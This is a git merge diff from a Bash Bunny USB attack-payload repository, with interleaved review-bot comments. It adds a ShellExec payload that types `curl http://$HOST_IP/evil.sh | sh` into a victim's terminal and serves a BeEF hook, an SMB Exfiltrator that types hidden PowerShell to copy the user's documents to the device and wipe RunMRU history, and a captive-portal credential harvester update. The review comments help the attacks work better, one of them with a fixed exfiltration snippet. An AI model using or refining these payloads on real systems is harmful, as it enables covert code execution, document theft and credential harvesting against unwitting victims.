Merge remote-tracking branch 'upstream/master'

pull/72/head
oXis 2017-03-23 20:03:57 +00:00
commit dc47035272
9 changed files with 259 additions and 7 deletions


@ -1,7 +1,7 @@
# Captive Portal for the Bash Bunny
Author: Sebkinne
Version: 1.0
Version: 1.1
## Description


@ -2,10 +2,7 @@
#
# Title: Captiveportal
# Author: Sebkinne
# Version: 1.0
# Usage of bunny_helpers.sh to avoid problems with find in function startCaptiveportal
https://forums.hak5.org/index.php?/topic/40237-install-tools/
# Version: 1.1
# Add or remove inputs here
INPUTS=(username password)
@ -18,6 +15,9 @@ ATTACKMODE RNDIS_ETHERNET
# DO NOT EDIT BELOW THIS LINE #
##################################################################
source bunny_helpers.sh
WORKINGPATH="/root/udisk/payloads/$SWITCH_POSITION"
# Sets up iptable forwarding and filters
function setupNetworking() {
echo 1 > /proc/sys/net/ipv4/ip_forward
@ -30,8 +30,7 @@ function setupNetworking() {
# Find payload directory and execute payload
function startCaptiveportal() {
# cd $(dirname $(find /root/udisk/payloads/ -name portal.html))
cd /root/udisk/payloads/$SWITCH_POSITION
cd $WORKINGPATH
chmod +x captiveportal
./captiveportal ${INPUTS[@]}
}
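Review bot: The new `cd $WORKINGPATH` in startCaptiveportal is unquoted and its exit status is ignored, so if the switch-position directory is missing the function falls through and runs `chmod +x captiveportal` and `./captiveportal` in whatever the current directory happens to be. Make the failure stop the payload with `cd "$WORKINGPATH" || exit 1`, and quote the argument expansion as `./captiveportal "${INPUTS[@]}"` so an input name with whitespace stays a single argument. WORKINGPATH is built from `$SWITCH_POSITION`, which presumably comes from the sourced bunny_helpers.sh and is not visible in this diff.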


@ -0,0 +1,6 @@
!#/bin/bash
# opens browsers to the bunny's index.html page
[[ "$(uname)" == "Darwin" ]] && open http://172.16.64.1
[[ "$(uname)" == "Linux" ]] && xdg-open http://172.16.64.1
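Review bot: The first line `!#/bin/bash` has the shebang characters transposed and should be `#!/bin/bash`. As written the file cannot be executed directly, and when it is piped into `sh` the way the ShellExec payload does, the shell will most likely try to run `!#/bin/bash` as a command and print a "not found" error before continuing with the `open`/`xdg-open` lines. Both of those lines hard-code 172.16.64.1, while the payload that fetches this script builds its URL from `$HOST_IP`; if those can differ, the address should be substituted when the file is served rather than fixed here.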


@ -0,0 +1 @@
alert('This is where your evil JavaScript file would go')


@ -0,0 +1,12 @@
<html>
<head>
<script type="text/javascript" src="http://172.16.64.1/hook.js"></script>
</head>
<body>
Nothing to see here!
</body>
</html>


@ -0,0 +1,54 @@
#!/bin/bash
# Title: ShellExec
# Author: audibleblink
# Target: Mac/Linux
# Version: 1.0
#
# Create a web server on the BashBunny and forces
# the victim download and execute a script.
#
# White | Ready
# Ammber blinking | Waiting for server
# Blue blinking | Attacking
# Green | Finished
LED R G B
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
source bunny_helpers.sh
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
log_file=$payload_dir/shellexec.log
cd $payload_dir
# starting server
LED R G 500
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED B 500
Q GUI SPACE
Q DELAY 300
Q STRING terminal
Q DELAY 100
Q ENTER
Q DELAY 2000
# Q ALT F2 # swap with block above for linux
# Q DELAY 100
Q STRING curl "http://$HOST_IP/evil.sh" \| sh
# in case curl isn't installed
# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh
Q ENTER
LED G
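Review bot: `python -m SimpleHTTPServer 80` is started in the foreground, so the script blocks on that line and never reaches the `nc -z localhost 80` wait loop or the HID keystrokes after it; the comment "wait until port is listening" only makes sense if the server is backgrounded, e.g. `python -m SimpleHTTPServer 80 >"$log_file" 2>&1 &`, which also gives the otherwise unused `log_file` a purpose. Be aware that this serves the whole payload directory, payload.txt and the log included, to anything on the link, and that the `iptables ... --dport 53 -j DROP` rule is never removed when the payload finishes. `cd $payload_dir` should also be `cd "$payload_dir" || exit 1` so a missing directory does not turn into serving `/`. The README added in this commit says evil.py is fetched, while the payload curls `evil.sh`.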


@ -0,0 +1,34 @@
# ShellExec
Author: audibleblink
Version: 1.0
## Description
Serves malicious scripts or web pages from the Bunny and forces
victims to curl and execute those scripts. Scripts can also force
browsers to open a url on the bunny to do things like serve BeEF
hooks.
## Configuration
evil.py - script that is fetched with DuckyScript
(provided script opens a web page that serves a BeEF hook )
hook.js - the aforementioned BeEF hook
index.html - BeEF hook delivery page
## Requirements
Just plug and play
## Status
| LED | Status |
| --------- | ----------- |
| White | Ready |
| Amber blinking | Waiting for server |
| Blue blinking | Attacking |
| Green | Finished |


@ -0,0 +1,115 @@
#!/bin/bash
#
# Title: SMB Exfiltrator
# Author: Hak5Darren
# Version: 1.0
# Category: Exfiltration
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, Ethernet
#
#
# Red Blink Fast.......Impacket not found
# Red Blink Slow.......Target did not acquire IP address
# Amber Blink Fast.....Initialization
# Amber................HID Stage
# Purple Blink Fast....Ethernet Stage
# Blue Interstitial....Receiving Files
# White................Moving loot to mass storage
# Green................Finished
#
# OPTIONS
LOOTDIR=/root/udisk/loot/smb_exfiltrator
EXFILTRATE_FILES="*.pdf"
CLEARTRACKS="yes" # yes or no
# Initialization
LED R G 100
# Check for impacket. If not found, blink fast red.
if [ ! -d /pentest/impacket/ ]; then
LED R 100
exit 1
fi
# HID STAGE
# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
# Once found, initiates file copy and exits
LED R G
ATTACKMODE HID
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
QUACK ENTER
# Clear tracks?
if [ $CLEARTRACKS == "yes" ]; then
QUACK DELAY 500
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
QUACK ENTER
fi
# ETHERNET STAGE
LED R B 100
ATTACKMODE RNDIS_ETHERNET
# Setup SMB server to receive loot in staging area
mkdir -p /root/loot/smb_exfiltrator/temp/
# house cleaning
rm -rf /root/loot/smb_exfiltrator/temp/*
# Fire up SMB Server
/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ &
# Source bunny_helpers.sh to get environment variables
source bunny_helpers.sh
# Give target a chance to start exfiltration
sleep 2
# Make loot directory based on hostname (increment for multiple uses)
mkdir -p $LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
COUNT=$((COUNT+1))
mkdir -p $LOOTDIR/$HOST-$COUNT
# Check target IP address. If unset, blink slow red.
if [ -z "${TARGET_IP}" ]; then
LED R 1000
exit 1
fi
# Wait until exfiltration is complete
last=0
current=1
while [ "$last" != "$current" ]; do
last=$current
current=$(find /root/loot/smb_exfiltrator/temp/ -exec stat -c "%Y" \{\} \; | sort -n | tail -1)
LED B
sleep 1
LED R B 100
sleep 9
# Files are still being copied. Loop.
# (Issue may exist if file takes longer than 10s to copy)
done
# Move files from staging area to loot directory
LED R G B
mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT
sync; sleep 1; sync
# Trap is clean
LED G
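Review bot: The loot directory name is built from `${TARGET_HOSTNAME}`, a value supplied by the target, and it is used unquoted in `ls -lad $LOOTDIR/$HOST* | wc -l` and `mkdir -p $LOOTDIR/$HOST-$COUNT`, so a hostname containing spaces, glob characters or a `/` would miscount, create stray directories or land the loot outside `$LOOTDIR`; the `ls` parse also prints an error and yields 0 on the first run because the unmatched glob is passed literally. Sanitise the name and count with a glob instead of `ls`, as below. Separately, the final `mv` has its exit status ignored, so the payload goes green with "Trap is clean" even when the staging directory is empty and nothing was received, and `[ $CLEARTRACKS == "yes" ]` should be `[[ "$CLEARTRACKS" == "yes" ]]` so an empty value does not produce a test error.
```shell
# Make loot directory based on hostname (increment for multiple uses)
mkdir -p "$LOOTDIR"
# Hostname comes from the target: keep only safe characters before using it as a path component
HOST=${TARGET_HOSTNAME//[^A-Za-z0-9_.-]/_}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=0
for d in "$LOOTDIR/$HOST"*; do
  [[ -e "$d" ]] && COUNT=$((COUNT+1))
done
COUNT=$((COUNT+1))
mkdir -p "$LOOTDIR/$HOST-$COUNT"
# … unchanged: target IP check and exfiltration wait loop …
mv /root/loot/smb_exfiltrator/temp/* "$LOOTDIR/$HOST-$COUNT" || { LED R 1000; exit 1; }
```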


@ -0,0 +1,31 @@
# SMB Exfiltrator
* Author: Hak5Darren
* Version: Version 1.0
* Target: Windows XP SP3+ (Powershell)
* Category: Exfiltration
* Attackmodes: HID, Ethernet
## Description
Exfiltrates select files from users's documents folder via SMB.
Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME-#
## Configuration
Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to desired.
## STATUS
| LED | Status |
| ------------------- | -------------------------------------- |
| Red (fast blink) | Impacket not found in /pentest |
| Red (slow blink) | Setup Failed. Target didn't obtain IP |
| Purple | HID Stage |
| Purple (fast blink) | Ethernet Stage |
| Blue (interupt) | Receiving files |
| White | Files received, moving to mass storage |
| Green | Finished |
## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40509-payload-smb-exfiltrator/ "Hak5 Forum Thread")